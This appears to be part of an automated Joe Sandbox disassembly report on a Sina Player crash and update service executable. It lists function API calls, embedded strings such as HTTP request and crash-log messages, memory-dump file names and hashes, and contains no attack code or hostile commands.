                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • HttpSendRequestW.WININET(?,00000000,00000000,?,?), ref: 003739BF
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003739CD
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003739EF
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00373A12
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373A4C
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 00373A8B
                                                                                                                                                                                                    • ??0exception@std@@QAE@ABQBD@Z.MSVCR120(?,?), ref: 00373AC2
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,003A3D38), ref: 00373AD4
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373AF3
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00373B16
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373B50
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00373B8E
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 00373B97
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(000000DF), ref: 00373BCE
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00373BE4
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 00373BED
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,SendRequest m_hRequest = ), ref: 00373C07
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z.MSVCP120(?), ref: 00373C15
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(Function_00001D40), ref: 00373C22
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 00373C49
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373C7F
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00373CA2
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00373CDC
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00373D1A
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 00373D23
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(000000E4), ref: 00373D5A
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00373D70
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 00373D79
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,EndRequest m_hRequest = ), ref: 00373D93
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z.MSVCP120(?), ref: 00373DA1
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(Function_00001D40), ref: 00373DAE
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 00373DCF
                                                                                                                                                                                                      • Part of subcall function 00372F00: HttpQueryInfoW.WININET(?,?,00000000,?,00000000), ref: 00372F5C
                                                                                                                                                                                                      • Part of subcall function 00372F00: HttpQueryInfoW.WININET(?,?,00000000,?,00000000), ref: 00372FAF
                                                                                                                                                                                                      • Part of subcall function 00372F00: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(00000000,-00000002), ref: 00372FED
                                                                                                                                                                                                      • Part of subcall function 00372F00: ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00372FF6
                                                                                                                                                                                                      • Part of subcall function 00372F00: ?SysWideToNativeMB@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z.BASE(?,?), ref: 00373003
                                                                                                                                                                                                      • Part of subcall function 00372F00: ??3@YAXPAX@Z.MSVCR120(?), ref: 00373015
                                                                                                                                                                                                      • Part of subcall function 00372760: ??3@YAXPAX@Z.MSVCR120(?), ref: 00372773
                                                                                                                                                                                                      • Part of subcall function 00371100: ??3@YAXPAX@Z.MSVCR120(?,?,00372E5A,?,00000000,00000000,0039DCC0,00000000,00000001,?,-00000002,000000FF,?,00000000,00000000), ref: 0037110B
                                                                                                                                                                                                    • atoi.MSVCR120(?), ref: 00373E59
                                                                                                                                                                                                    • atoi.MSVCR120(?), ref: 00373F20
                                                                                                                                                                                                    • atoi.MSVCR120(?), ref: 00373F71
                                                                                                                                                                                                    • InternetReadFile.WININET(?,00000000), ref: 00373FE2
                                                                                                                                                                                                    • ??0exception@std@@QAE@ABQBD@Z.MSVCR120(?), ref: 003740EB
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,003A3D38), ref: 003740FD
                                                                                                                                                                                                    • ??0exception@std@@QAE@ABQBD@Z.MSVCR120(?), ref: 00374119
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,003A3D38), ref: 0037412B
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037416D
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00374190
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003741CA
                                                                                                                                                                                                    • ?SysNativeMBToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?), ref: 0037420C
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00374229
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00374249
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000000), ref: 00374266
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 00374289
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 0037429A
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003742AA
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003742BE
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 003742EE
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00374337
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037435A
                                                                                                                                                                                                      • Part of subcall function 003713E0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,0037155F,?,?,?,?,?,?,003710EA,?,?), ref: 003713FA
                                                                                                                                                                                                      • Part of subcall function 003713E0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,0037155F,?,?,?,?,?,?,003710EA,?,?), ref: 0037141A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$V?$basic_streambuf@$??0?$basic_ios@??0?$basic_iostream@??3@D@std@@@1@@String$??0?$basic_streambuf@??6@V?$basic_ostream@$CountCurrentDebugOutputThreadTickV01@@$??0exception@std@@ExceptionThrow$InternetU?$char_traits@_$?rdbuf@?$basic_ios@D@std@@@2@Http$?width@ios_base@std@@memset$D@std@@NativeRequestV?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@std@@W@std@@@std@@atoi$??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?sputc@?$basic_streambuf@BasicD@2@@std@@@1@@InfoOpenOptionPiece@QueryW@2@@std@@Wide@base@@Xout_of_range@std@@$?flags@ios_base@std@@?pptr@?$basic_streambuf@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@B@base@@ConnectCrackD@2@@std@@ErrorFileHeadersLastOsfx@?$basic_ostream@ReadSendUnlock@?$basic_streambuf@W@2@@3@@Widelstrlenprintf
                                                                                                                                                                                                    • String ID: %s$)#sinaliveupgrade#[$)- $5$ApnsHTTP.cpp$Connect m_hConnect = $Content-Type: application/octet-streamAccept: */*$EndRequest m_hRequest = $Error:SendRequest failed dwErr:$GET$OpenRequest m_hRequest = $OpenSession m_hSession = $RequestGet bret = $RequestGet url = $SendRequest m_hRequest = $WinInetGet/0.1$X-Interval$catch_exception m_strStatusText = $o
                                                                                                                                                                                                    • API String ID: 512954013-4141091952
                                                                                                                                                                                                    • Opcode ID: 4cc31b0fcac6e4fc3ebb59020dd13791b51857c8b75abc5794f7edf25af2b4e7
                                                                                                                                                                                                    • Instruction ID: 2756587b4b4b1c505435ad27f1e9a0e4b321807a376619f8962b63c3b9878f57
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cc31b0fcac6e4fc3ebb59020dd13791b51857c8b75abc5794f7edf25af2b4e7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66B2AE75D00258ABCF22EFA4DD4AADDB7B8AF14305F0084D5E40DA7291DBB59B88CF61
                                                                                                                                                                                                    Function 00375F90 Relevance: 58.0, APIs: 26, Strings: 7, Instructions: 205windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0AtExitManager@base@@QAE@XZ.BASE ref: 00375FB7
                                                                                                                                                                                                    • ?Init@CommandLine@@SA_NHPBQBD@Z.BASE(00000000,00000000), ref: 00375FBF
                                                                                                                                                                                                      • Part of subcall function 00380320: ?RegisterProvider@PathService@@SAXP6A_NHPAVFilePath@base@@@ZHH@Z.BASE(0037FB30,000003E8,000003F8,00375FCD), ref: 0038032F
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE ref: 00375FD0
                                                                                                                                                                                                      • Part of subcall function 00375D70: ??0FilePath@base@@QAE@XZ.BASE(8285FFAB), ref: 00375DA0
                                                                                                                                                                                                      • Part of subcall function 00375D70: ?GetTempDir@base@@YA_NPAVFilePath@1@@Z.BASE(?), ref: 00375DB1
                                                                                                                                                                                                      • Part of subcall function 00375D70: ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,sina_player_crashes,00000013), ref: 00375DF4
                                                                                                                                                                                                      • Part of subcall function 00375D70: ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 00375E08
                                                                                                                                                                                                      • Part of subcall function 00375D70: ??1FilePath@base@@QAE@XZ.BASE ref: 00375E11
                                                                                                                                                                                                      • Part of subcall function 00375D70: ??3@YAXPAX@Z.MSVCR120(?), ref: 00375E24
                                                                                                                                                                                                      • Part of subcall function 00375D70: ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00375E44
                                                                                                                                                                                                      • Part of subcall function 00375D70: ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00375E55
                                                                                                                                                                                                      • Part of subcall function 00375D70: ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 00375E68
                                                                                                                                                                                                      • Part of subcall function 00375D70: ??1FilePath@base@@QAE@XZ.BASE ref: 00375E7A
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,crash_service_log.txt,00000015), ref: 0037600C
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037601B
                                                                                                                                                                                                      • Part of subcall function 00375EC0: InterlockedCompareExchange.KERNEL32(003AC118,00000001,00000000), ref: 00375EFB
                                                                                                                                                                                                      • Part of subcall function 00375EC0: ??2@YAPAXI@Z.MSVCR120(00000134,?,?,?,003993DB,000000FF), ref: 00375F0A
                                                                                                                                                                                                      • Part of subcall function 00375EC0: ?RegisterCallback@AtExitManager@base@@SAXP6AXPAX@Z0@Z.BASE(00375EA0,00000000), ref: 00375F45
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037AF0C
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037AF2F
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037AF69
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: GetCurrentThreadId.KERNEL32 ref: 0037AFA3
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: GetTickCount.KERNEL32 ref: 0037AFC0
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037AFDD
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,6C6C56E0), ref: 0037B000
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037B011
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037B02B
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037B049
                                                                                                                                                                                                      • Part of subcall function 0037AEC0: ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037B058
                                                                                                                                                                                                      • Part of subcall function 0038A4B0: ??0LockImpl@internal@base@@QAE@XZ.BASE(8285FFAB,6C6C56E0,?,00000000,0039B4EB,000000FF,?,0037614C), ref: 0038A50C
                                                                                                                                                                                                      • Part of subcall function 0038AE00: ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,crash_checkpoint.txt,00000014,\\.\pipe\SinaPlayerCrashServices,00000020,8285FFAB,6C6CE380,6C6C56E0,00000000), ref: 0038AEA0
                                                                                                                                                                                                      • Part of subcall function 0038AE00: ??3@YAXPAX@Z.MSVCR120(?), ref: 0038AEB3
                                                                                                                                                                                                      • Part of subcall function 0038AE00: ?ForCurrentProcess@CommandLine@@SAPAV1@XZ.BASE ref: 0038AECF
                                                                                                                                                                                                      • Part of subcall function 0038AE00: ??0FilePath@base@@QAE@ABV01@@Z.BASE(?), ref: 0038AEE3
                                                                                                                                                                                                      • Part of subcall function 0038AE00: ?HasSwitch@CommandLine@@QBE_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.BASE(00000000,dumps-dir,00000009), ref: 0038AF18
                                                                                                                                                                                                      • Part of subcall function 0038AE00: ??3@YAXPAX@Z.MSVCR120(00000000), ref: 0038AF31
                                                                                                                                                                                                      • Part of subcall function 0038AE00: ?GetSwitchValueNative@CommandLine@@QBE?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@3@@Z.BASE(?,00000000,dumps-dir,00000009), ref: 0038AF76
                                                                                                                                                                                                    • ??0LoggingSettings@logging@@QAE@XZ.BASE ref: 00376029
                                                                                                                                                                                                    • ?BaseInitLoggingImpl_built_with_NDEBUG@logging@@YA_NABULoggingSettings@1@@Z.BASE(00000003), ref: 00376051
                                                                                                                                                                                                    • ?SetLogItems@logging@@YAX_N000@Z.BASE(00000001,00000001,00000001,00000000), ref: 0037605F
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE ref: 0037606E
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(main.cc,0000003E,00000001), ref: 00376088
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000,?,0039DD2C), ref: 003760A6
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 003760CC
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE ref: 003760D1
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003EB,?), ref: 003760E0
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE ref: 003760ED
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 00376129
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE(?,?), ref: 00376179
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 003761B8
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE ref: 003761D3
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(main.cc,00000054,00000001), ref: 003761F0
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,00000000), ref: 0037620A
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE(?,00000000), ref: 0037621B
                                                                                                                                                                                                      • Part of subcall function 00375EC0: ?WaitForInstance@internal@base@@YAHPAH@Z.BASE(003AC118,?,?,?,003993DB,000000FF), ref: 00375F65
                                                                                                                                                                                                      • Part of subcall function 0037C890: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB,00000000), ref: 0037C8E1
                                                                                                                                                                                                      • Part of subcall function 0037C890: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037C904
                                                                                                                                                                                                      • Part of subcall function 0037C890: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037C93E
                                                                                                                                                                                                      • Part of subcall function 0037C890: GetCurrentThreadId.KERNEL32 ref: 0037C978
                                                                                                                                                                                                      • Part of subcall function 0037C890: GetTickCount.KERNEL32 ref: 0037C995
                                                                                                                                                                                                      • Part of subcall function 0037C890: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037C9B2
                                                                                                                                                                                                      • Part of subcall function 0037C890: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 0037C9D5
                                                                                                                                                                                                      • Part of subcall function 0037C890: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 0037C9E6
                                                                                                                                                                                                      • Part of subcall function 0037C890: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037CA00
                                                                                                                                                                                                      • Part of subcall function 0037C890: OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037CA1E
                                                                                                                                                                                                      • Part of subcall function 0037C890: ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037CA2D
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00376231
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00376236
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037623B
                                                                                                                                                                                                    • ??1AtExitManager@base@@QAE@XZ.BASE ref: 00376243
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$File$D@std@@@std@@$Path@base@@V01@$??6?$basic_ostream@$??3@Message@logging@@$V01@@$CommandLevel@logging@@Line@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$Append@CurrentExitLoggingManager@base@@PathPath@1@@V12@W@2@@std@@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@CountD@std@@D@std@@@1@@DebugOutputPath@base@@@RegisterService@@StringThreadTickV?$allocator@V?$basic_streambuf@V?$basic_string@$??2@??6@BaseCallback@CompareCreateD@2@@3@@D@2@@std@@@Dir@base@@DirectoryExchangeExists@base@@G@logging@@Get@Impl@internal@base@@Impl_built_with_InitInit@Instance@internal@base@@InterlockedItems@logging@@LockN000@Native@Process@Provider@Settings@1@@Settings@logging@@SwitchSwitch@TempV?$basic_ostream@ValueW@2@@std@@W@base@@Wait
                                                                                                                                                                                                    • String ID: could not get DIR_CRASH_DUMPS$crash_service_log.txt$main.cc$ready to process crash requests$session end. return code is $session start. cmdline is [$Vll
                                                                                                                                                                                                    • API String ID: 3940691640-1990257193
                                                                                                                                                                                                    • Opcode ID: 0daaa2a40dd11cb45678d92e497819a896a81431f6d2ff0a039d61daead54eb6
                                                                                                                                                                                                    • Instruction ID: b886af567dabd436af4f9d6d01c43c7854d79efc0af72396b2aa216511fad1ab
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0daaa2a40dd11cb45678d92e497819a896a81431f6d2ff0a039d61daead54eb6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B771F272E002089BDF22EBB4EC9BBDD7778EF40305F41445AE50AA7191EB795A48CF61
                                                                                                                                                                                                    Function 00381880 Relevance: 56.6, APIs: 28, Strings: 4, Instructions: 627comCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 003975EF: __onexit.MSVCRT ref: 003975F5
                                                                                                                                                                                                      • Part of subcall function 003861E0: ??3@YAXPAX@Z.MSVCR120(?), ref: 00386247
                                                                                                                                                                                                      • Part of subcall function 003861E0: ??3@YAXPAX@Z.MSVCR120(?), ref: 0038626A
                                                                                                                                                                                                    • ?Base64Encode@base@@YAXABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.BASE(?,00000000,6C6C52C0), ref: 00381987
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 003819A3
                                                                                                                                                                                                    • ?ASCIIToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?), ref: 003819DF
                                                                                                                                                                                                    • ?WideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z.BASE(?,?,?), ref: 00381A03
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00381A27
